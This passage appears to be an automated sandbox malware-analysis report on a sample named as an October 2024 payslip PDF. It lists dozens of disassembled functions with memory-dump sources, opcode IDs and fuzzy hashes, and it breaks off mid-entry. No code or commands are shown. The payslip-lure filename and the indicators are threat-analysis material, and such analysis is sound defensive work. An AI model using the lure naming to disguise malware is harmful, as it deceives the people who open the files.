                                              • Opcode Fuzzy Hash: 93078fd54e80e2a5b340e7df395c95dadf5d299466aaff7cc5a799f980e31fbc
                                              • Instruction Fuzzy Hash: A361DE71F000114FDF24AA6EC88066FBADBAF95220F254479D90EDB364EF69ED4287D1
                                              Function 068443B2 Relevance: .2, Instructions: 224COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9d00c5d2ed9dc1133fad2dd1e4e4a5ae0580696fec01cb164cd60e290b3f0050
                                              • Instruction ID: 9c3144f80813a20fb8be2d2a841af5adfc7c77bc7b19ff62b7d3636269307aad
                                              • Opcode Fuzzy Hash: 9d00c5d2ed9dc1133fad2dd1e4e4a5ae0580696fec01cb164cd60e290b3f0050
                                              • Instruction Fuzzy Hash: 07814C31B0020A8BDF54EFA9D45479EB7F2EB99314F208429D50ADB394DF35DC468B92
                                              Function 068446CC Relevance: .2, Instructions: 214COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4c1d084c6cb6e5df8f84bced136ef7aed5c85f88307de3f1f1a49f42589e6fc8
                                              • Instruction ID: 8614a2f2996af1c7a8ef36cbccc429eaa0d156811a3c58216c7e26c6b0ab4cf3
                                              • Opcode Fuzzy Hash: 4c1d084c6cb6e5df8f84bced136ef7aed5c85f88307de3f1f1a49f42589e6fc8
                                              • Instruction Fuzzy Hash: 4E915D30E1021A8BDF60DF64C890B9DB7B1FF89310F208599D549FB295DB74AA86CF51
                                              Function 068446E0 Relevance: .2, Instructions: 210COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1f5adbc521507c596b024469daaed5d2e7a3b6399ba82df892ef7d7eeab9ba2a
                                              • Instruction ID: 0f8192c023332fe95b89c9aff1956312e8981a4b147b00be11677855d754c8ba
                                              • Opcode Fuzzy Hash: 1f5adbc521507c596b024469daaed5d2e7a3b6399ba82df892ef7d7eeab9ba2a
                                              • Instruction Fuzzy Hash: AC915C30E1021A8BDF60DF68C890B9DB7B1FF89310F208699D54DBB255DB71AA86CF51
                                              Function 0684F040 Relevance: .2, Instructions: 201COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4afc9987a234db6274969efde4b66ace7d58bcbdf5f6888778725df143c4d17c
                                              • Instruction ID: 9ca7c72e9508896613102599e662d127a8cc7de53d79c37b09c819410ff7b48a
                                              • Opcode Fuzzy Hash: 4afc9987a234db6274969efde4b66ace7d58bcbdf5f6888778725df143c4d17c
                                              • Instruction Fuzzy Hash: 2B713A30A002099FDB54EFA9D990AADBBF6FF88300F148529D509EB259DB34ED46CB51
                                              Function 0684F031 Relevance: .2, Instructions: 200COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0b063d35549e0b5546b233ec20281533d05f353f440572bf62a156953b633a05
                                              • Instruction ID: 54884fa1774d4ee0283da35cda5db30658a9cd3a439aadac011b9751681f9040
                                              • Opcode Fuzzy Hash: 0b063d35549e0b5546b233ec20281533d05f353f440572bf62a156953b633a05
                                              • Instruction Fuzzy Hash: B9713C70A002099FDB54EFA9D990AADBBF6FF88300F148529D509EB358DB34ED46CB50
                                              Function 0684FCC1 Relevance: .2, Instructions: 173COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f2bb401e27459f4af6a8e2725d931a13f9f3a3b04d431b086d0386ff173f5589
                                              • Instruction ID: 9aaa7b588a71fb33e4dd74c4d2a6081bf8f9e8e477d0d384331ddc282ab9c1c0
                                              • Opcode Fuzzy Hash: f2bb401e27459f4af6a8e2725d931a13f9f3a3b04d431b086d0386ff173f5589
                                              • Instruction Fuzzy Hash: 8551D231E01109CFDF64FBB8E4946ADBBB2FF84316F108869E21ADB255DB358845CB81
                                              Function 0684FA70 Relevance: .2, Instructions: 168COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: da3a20fd327c29adddf6e21a43cc16ffbdc78800a43e8c2c08f1e185e38eb027
                                              • Instruction ID: e851e64ab5e94d4b9f2ee6a00bd32ed7dc8df411f1b1d2a5fd5c525f64c97234
                                              • Opcode Fuzzy Hash: da3a20fd327c29adddf6e21a43cc16ffbdc78800a43e8c2c08f1e185e38eb027
                                              • Instruction Fuzzy Hash: 2951A970B202199FEFA4A66CD95476F265EDBC9314F20482DE60AD73D9CA3CCC458792
                                              Function 0684FA80 Relevance: .2, Instructions: 163COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ed136014d922ef80281ff6b320d79a3f769cc41dba1964ef885f1bf263151a8d
                                              • Instruction ID: 158ebc1d73999d8bf1e3151b85f04dee947157b347562a0ea1303bd5a5bd662a
                                              • Opcode Fuzzy Hash: ed136014d922ef80281ff6b320d79a3f769cc41dba1964ef885f1bf263151a8d
                                              • Instruction Fuzzy Hash: 82519770B202189FEFA4B66CD95472F265EDBC9354F20482DEA0AD73D9CA3CCC458396
                                              Function 06845522 Relevance: .1, Instructions: 131COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b1179a8ec032bc03dabd4609b996fcb53c98e9016738614df8fbf84112540e22
                                              • Instruction ID: 182317f0d4bedee92cbc5979b5c6e573ebf2e652d61e724f233ebeaafcad1bcd
                                              • Opcode Fuzzy Hash: b1179a8ec032bc03dabd4609b996fcb53c98e9016738614df8fbf84112540e22
                                              • Instruction Fuzzy Hash: 6C416F71E002099FDF60DEA9D880ABFF7B2FB84310F10492AE256D7650D735E855CB92
                                              Function 0684DA90 Relevance: .1, Instructions: 97COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 46e1b388035cac970610e9ed9d31afd707ce9b390b749c922946bf2c2fab56d4
                                              • Instruction ID: c1484170b54fcce9847858667bb042d533e226f30489777669ac0bf837e7e307
                                              • Opcode Fuzzy Hash: 46e1b388035cac970610e9ed9d31afd707ce9b390b749c922946bf2c2fab56d4
                                              • Instruction Fuzzy Hash: 0E31C730E1020A8BCF14EFA5D980A9EBBB5FF85300F148929E505EB344EB74E946CB81
                                              Function 06842081 Relevance: .1, Instructions: 96COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e8f5d6b5ac5cb37eba1cfbe41e07f93603048f8995e557d1b497d56450614d89
                                              • Instruction ID: 3b30707370e6412bb300b54bbe0665484871c76c5979d8efaf131f39e2c23f60
                                              • Opcode Fuzzy Hash: e8f5d6b5ac5cb37eba1cfbe41e07f93603048f8995e557d1b497d56450614d89
                                              • Instruction Fuzzy Hash: DA319034E1424ADBDB05EFA4D8646AEBBF2BF89300F10C519E906EB350DB75AD46CB40
                                              Function 06842090 Relevance: .1, Instructions: 91COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3c177482ade0ceeaa94a3b36e99adcb4034ef0e33462660ddd9481418f3a162b
                                              • Instruction ID: ce49303de4ddac17a71a1845d815e76ba3a276e27236655aa96855d32a344c86
                                              • Opcode Fuzzy Hash: 3c177482ade0ceeaa94a3b36e99adcb4034ef0e33462660ddd9481418f3a162b
                                              • Instruction Fuzzy Hash: 30318030E142099BCB09EF65D86469EB7F6BF89310F108529F906EB350DB71AD42CB50
                                              Function 06843FB9 Relevance: .1, Instructions: 81COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 43f97077cda7198efdd549049b681e681f530731a568d2b083cffadc6868faf8
                                              • Instruction ID: c6af48b5d3739a315d6d0658d6d3c33dcd98672883bcfb3b6795464393411cab
                                              • Opcode Fuzzy Hash: 43f97077cda7198efdd549049b681e681f530731a568d2b083cffadc6868faf8
                                              • Instruction Fuzzy Hash: F521AE76F002099FDB50EFA9D891BAEBBF5EB58710F148025EA09E7390E735D811CB91
                                              Function 06843FC8 Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 81ee82bc86d3b0897d8bcba59c33c6df139aeffd7c517eab79104a7cf05623a1
                                              • Instruction ID: b3e162f8941c0407b018d93b8106ef3bee33aa41b15250a50b95a3fd78bbd07d
                                              • Opcode Fuzzy Hash: 81ee82bc86d3b0897d8bcba59c33c6df139aeffd7c517eab79104a7cf05623a1
                                              • Instruction Fuzzy Hash: D6217C75F002199FDB50EF69D881AAEBBF5EB58310F148025E905E7340E735D911CB91
                                              Function 0684B030 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 396e67beb5efa118865c411d8f8759001275595f3a8249d31a11af0ee9169bd5
                                              • Instruction ID: ac06de511555d7a01be50985082e59a1216fc9ed7376dbbaa1c454305c53ce2a
                                              • Opcode Fuzzy Hash: 396e67beb5efa118865c411d8f8759001275595f3a8249d31a11af0ee9169bd5
                                              • Instruction Fuzzy Hash: 82217F71D1071E8BCF64DFA9C44069EBBB5FF85310F10892AE905EB240DB70E945CB81
                                              Function 0102D030 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492351182.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_102d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cad6d0337c543d9b2ae305b9d390ae7f1bd8ad7a3db160b95961194c33bdab63
                                              • Instruction ID: aa1425feb38fb1add0eb5380bf69db521122bf3f29d360e5d07467c47edf97df
                                              • Opcode Fuzzy Hash: cad6d0337c543d9b2ae305b9d390ae7f1bd8ad7a3db160b95961194c33bdab63
                                              • Instruction Fuzzy Hash: 5821F271504204DFDB15DF98D9C0F26BBA5FB88314F24C5AEE9894B266C33ED846CB62
                                              Function 0102D3A8 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492351182.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_102d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e22432d842d7e0c2668be4c570ea1e50caf36ab433832f0fc385a15406aa5acf
                                              • Instruction ID: 23e7f6a137153f5fefeca91857beb41f062ced9aeab6b567f75ede5d40d7a60a
                                              • Opcode Fuzzy Hash: e22432d842d7e0c2668be4c570ea1e50caf36ab433832f0fc385a15406aa5acf
                                              • Instruction Fuzzy Hash: EE2137B1500204DFDB05DF68D5C0B26BBA5FB84314F20C5ADD9894B256C73AE806CB61
                                              Function 0102D1F8 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492351182.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_102d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9591fdde21002fd4bd5fd91ccd45b077d023886192e44dde0041524eb5f7fe2c
                                              • Instruction ID: 9a055a13a8725831b2531cb1dc1956494a7b2eb5fc9d0e3d4983781ac127a5fa
                                              • Opcode Fuzzy Hash: 9591fdde21002fd4bd5fd91ccd45b077d023886192e44dde0041524eb5f7fe2c
                                              • Instruction Fuzzy Hash: 51212971504204DFDB15DF98D584B2ABBA5FB95324F20C569D8890B246C37AD80ACBA1
                                              Function 0102D118 Relevance: .1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492351182.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_102d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7672517989cd64fb362f62480d08f70092dd5d5d863f8ec8de510c9e235b9b8c
                                              • Instruction ID: 5f0731f156fa872876564d2c69280c9b44e8c8c4915cd1c52547212bc87165ee
                                              • Opcode Fuzzy Hash: 7672517989cd64fb362f62480d08f70092dd5d5d863f8ec8de510c9e235b9b8c
                                              • Instruction Fuzzy Hash: 3C21F271644244EFDB05DF58C9C0B26BFA5FB84318F30C5ADD9894B696C33AD846C761
                                              Function 068440D8 Relevance: .1, Instructions: 59COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04a41912e42464ac8236ee8b61a3604bfd1cf4ed9a48124c479ac657b41e0af7
                                              • Instruction ID: a4915127e6899f8fd242863142fa57aba5f928a3f2edc3a15beba92e3ff8c928
                                              • Opcode Fuzzy Hash: 04a41912e42464ac8236ee8b61a3604bfd1cf4ed9a48124c479ac657b41e0af7
                                              • Instruction Fuzzy Hash: FD11A132B101299BDF94E678CC546AE73EAEBD8315F048139D50AE7344DE75DC128BD1
                                              Function 06844310 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 052d2fccabfded746723514ce05d600cab5d293aabad0ca8ac826200719c7202
                                              • Instruction ID: 3cafd6deb3c8e4ef1c4c853cfbb5943b1f0625adfca8f372ac39ca5f04a9ceed
                                              • Opcode Fuzzy Hash: 052d2fccabfded746723514ce05d600cab5d293aabad0ca8ac826200719c7202
                                              • Instruction Fuzzy Hash: 9E01D432B100150BDB54A5ADE410B5FB7DAEBC5B24F248439F20EC7351EE65DC034385
                                              Function 0684F2B0 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7d7394f3d16813079e45fe29a31e2d410aeb0692367dee8fa0b84774a49a1c92
                                              • Instruction ID: 07ffaa55e0ea62517df23efd8ddf9254ee5c25af6f1f91198bc0bd97b0bb4766
                                              • Opcode Fuzzy Hash: 7d7394f3d16813079e45fe29a31e2d410aeb0692367dee8fa0b84774a49a1c92
                                              • Instruction Fuzzy Hash: F801D431B105150FCB69E67D945476FB7D6EBCA221F24847EE20AC7340DA14DD438782
                                              Function 0102D3A3 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492351182.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_102d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction ID: a358d6653469a10bf5aee565f4246eee7a70c529575fe75b3feecbc41bbc3659
                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction Fuzzy Hash: 7911BB75504280CFDB02CF54D5C4B15BFA2FB84314F24C6AAD9894B2A6C33AE84ACB62
                                              Function 0102D1F3 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492351182.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_102d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                              • Instruction ID: d434c0eb2c1d146574841899ef5fc603f35398e602a4dac93ce129322786cc23
                                              • Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                              • Instruction Fuzzy Hash: 1811C176504280CFDB12CF54D5C4B19FFB1FB95324F24C6AAD8894B656C33AD80ACBA2
                                              Function 0102D02B Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492351182.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_102d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction ID: d805432ba919086e31828c93343ee608e30e86d992f2a1e9377779e14a661368
                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction Fuzzy Hash: 9A11BE75504280DFDB12CF54D5C4B15BFA2FB84314F24C6AAE9894B666C33AD84ACB62
                                              Function 0102D113 Relevance: .1, Instructions: 52COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492351182.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_102d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                              • Instruction ID: 8a0162d9836d5e8a5028f25d443587f7b3e137fcd446254f24cd8fdadf14fb94
                                              • Opcode Fuzzy Hash: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                              • Instruction Fuzzy Hash: 5711BB75504280DFDB06CF14C9C4B15BFA2FB84218F24C6AAD8894BA92C33AD84ACB52
                                              Function 06844320 Relevance: .1, Instructions: 51COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6740f1b02c209fe2f40f96b7855df88c35ea1f620d68caf022d31632fa3fa968
                                              • Instruction ID: 2bddf3da35512085755d8bbe80051a0c862044e72b7cbb310a683e76edb11184
                                              • Opcode Fuzzy Hash: 6740f1b02c209fe2f40f96b7855df88c35ea1f620d68caf022d31632fa3fa968
                                              • Instruction Fuzzy Hash: 07018131B101150BDB65A9BDE454B6FB7DAEBC9B24F20843AF20ECB354DE66DC024391
                                              Function 068440C9 Relevance: .0, Instructions: 50COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0711fa19850584a4e3869f2aedf177e8cb9f1103b3f5557450ed68c628584120
                                              • Instruction ID: 6eacd2d004387e49f75b21b8a7301f45d542cfdd765cd5715c81eadbd50cbed5
                                              • Opcode Fuzzy Hash: 0711fa19850584a4e3869f2aedf177e8cb9f1103b3f5557450ed68c628584120
                                              • Instruction Fuzzy Hash: B3018F36F100294BEBA5A568DC553EE72EADBD8215F048036D50AE7384EA65CC1647D1
                                              Function 0684A418 Relevance: .0, Instructions: 50COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 55ab0ea94396250d9ecd6f0a9ea9a3c6e45eeef6537dbe2bb36aa012553e30d6
                                              • Instruction ID: 4d96aabb792a30aff163ba6d11850fa9e586f9f2cf645d3bc6ae52cb28b982f5
                                              • Opcode Fuzzy Hash: 55ab0ea94396250d9ecd6f0a9ea9a3c6e45eeef6537dbe2bb36aa012553e30d6
                                              • Instruction Fuzzy Hash: 5B012432B100084BDBA9E67DD46532E67C5EB89264F108424E20ECB398EF22DC028381
                                              Function 0684F2C0 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a743f3f956224923a74ce3ae2f0da61d9979f746354a829506384cac712e5f7e
                                              • Instruction ID: 5aea5af67e31086da42b2ce668db6a5f2b2859911c816b8b9abc983a1f1034fb
                                              • Opcode Fuzzy Hash: a743f3f956224923a74ce3ae2f0da61d9979f746354a829506384cac712e5f7e
                                              • Instruction Fuzzy Hash: A0018C35B004150BCB69A67ED494B2E76DAEBCA620F20883EE20AC7344EE25DD034786
                                              Function 0684A428 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4e83c92de76b4344bb85b4fe5aec2ef48fe6ecfd404092bcbfed8ba6af3b4575
                                              • Instruction ID: 0fb7ecdf7dabd3d3bd8f2e1baa0ecd4f2f4cb3ed01806c8a4bac240a585a6101
                                              • Opcode Fuzzy Hash: 4e83c92de76b4344bb85b4fe5aec2ef48fe6ecfd404092bcbfed8ba6af3b4575
                                              • Instruction Fuzzy Hash: 1601D131B100184BCB69EA7DE45472E77D9EBC9764F108438E20ECB398DE21EC028781
                                              Function 0101D8C9 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492247130.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_101d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f91a1a798165564b8c479b96628027843f2010fa66793a2e7fe5d6aa44004330
                                              • Instruction ID: eab35fe5d668cf3cb8b11e15760da5002a0ab11c4805ecef8a9cc5e6103925e4
                                              • Opcode Fuzzy Hash: f91a1a798165564b8c479b96628027843f2010fa66793a2e7fe5d6aa44004330
                                              • Instruction Fuzzy Hash: ED01DB71004354AAE7208F99DDC8B67BFDDEF45324F18C46AED991A28BC27D9840CB71
                                              Function 0684C900 Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 70cad92373688308fe5d7decde5a25812968f3f30c24a2087d7efe02a722d2df
